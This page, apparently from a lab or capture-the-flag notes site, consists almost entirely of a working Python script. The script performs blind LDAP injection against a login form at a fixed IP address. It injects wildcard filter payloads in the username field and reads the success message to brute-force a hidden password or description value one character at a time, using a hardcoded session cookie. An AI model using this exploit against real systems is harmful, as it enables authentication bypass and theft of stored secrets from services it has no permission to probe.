LDAP Data exfil

LDAP - LDAP injection - Authentication bypass - Brute force

import requests
import string

url = "http://94.237.50.242:31867"
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": "PHPSESSID=b2feampt7epd0bfb0lqmtl7i9h"
}
success_msg = "Login successful"
alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$%^&*()-_=+[]{}|;:'\",.<>?/\\`~"

password = ""
max_length = 50

for position in range(1, max_length + 1):
    for char in alphabet:

        payload = f")(|(description={password}{char}*"

        # Post request
        data = f"username=admin{payload}&password=invalid)"
        x = requests.post(url, data, headers=headers)

        # Check for success message
        if success_msg in x.text: 
            password += char
            print(f"Current password: {password}")
            break
    
    # No match means complete
    else:
        break

print(f"Password: {password}")

Last updated

Was this helpful?